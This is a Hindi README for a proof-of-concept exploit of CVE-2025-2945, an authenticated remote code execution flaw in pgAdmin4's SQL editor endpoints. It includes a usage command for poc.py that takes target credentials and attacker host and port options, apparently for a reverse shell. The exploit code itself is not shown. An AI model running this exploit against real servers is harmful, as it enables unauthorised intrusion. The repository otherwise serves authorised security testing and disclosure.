
pgAdmin4 (CVE-2025-2945) में SQL एडिटर के दुरुपयोग के माध्यम से प्रमाणित रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए डिज़ाइन किया गया।
इस रिपॉजिटरी में एक प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है, जो सुरक्षा अनुसंधान और अधिकृत पेनिट्रेशन परीक्षण के लिए बनाई गई है और यह CVE-2025-2945 भेद्यता से संबंधित है, जो pgAdmin4 के कुछ संस्करणों को प्रभावित करती है।
यह समस्या SQL एडिटर तक पहुँच रखने वाले एक प्रमाणित pgAdmin उपयोगकर्ता को Query Tool पैनल आरंभीकरण प्रवाह का दुरुपयोग करके रिमोट कोड निष्पादन ट्रिगर करने की अनुमति देती है। यह PoC केवल शैक्षिक, ऑडिटिंग और रक्षात्मक उद्देश्यों के लिए भेद्यता को प्रदर्शित करता है।
यह टूल केवल इनके लिए है:
स्पष्ट अनुमति के बिना किसी भी सिस्टम पर इस टूल का उपयोग न करें। अनधिकृत उपयोग अवैध और अनैतिक है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।
यह भेद्यता SQL एडिटर आरंभीकरण एंडपॉइंट्स में लॉजिक दोषों से उत्पन्न होती है। जब /sqleditor/initialize/ और /sqleditor/panel/ के साथ इंटरैक्ट किया जाता है, तो एप्लिकेशन उपयोगकर्ता-नियंत्रित डेटा को गलत तरीके से संभालता है, जो अंततः क्राफ्टेड पेलोड्स को मनमाने बैकएंड कमांड निष्पादित करने की अनुमति देता है।
PoC निम्नलिखित एंडपॉइंट अनुक्रम का शोषण करता है:
requests लाइब्रेरीpython3 poc.py \
--target-url <pgadmin-url> \
--username <pgadmin-user> \
--password <pgadmin-pass> \
--db-user <db-username> \
--db-pass <db-password> \
--db-name <database> \
--Rhost <your-ip> \
--Rport <your-port>
(स्क्रिप्ट के सहायता अनुभाग में एक पूर्ण उदाहरण पहले से ही दिया गया है।)
poc.py → The exploit proof-of-concept
README.md → Project documentation
प्रशासकों को चाहिए:
लेखक: UdayVeer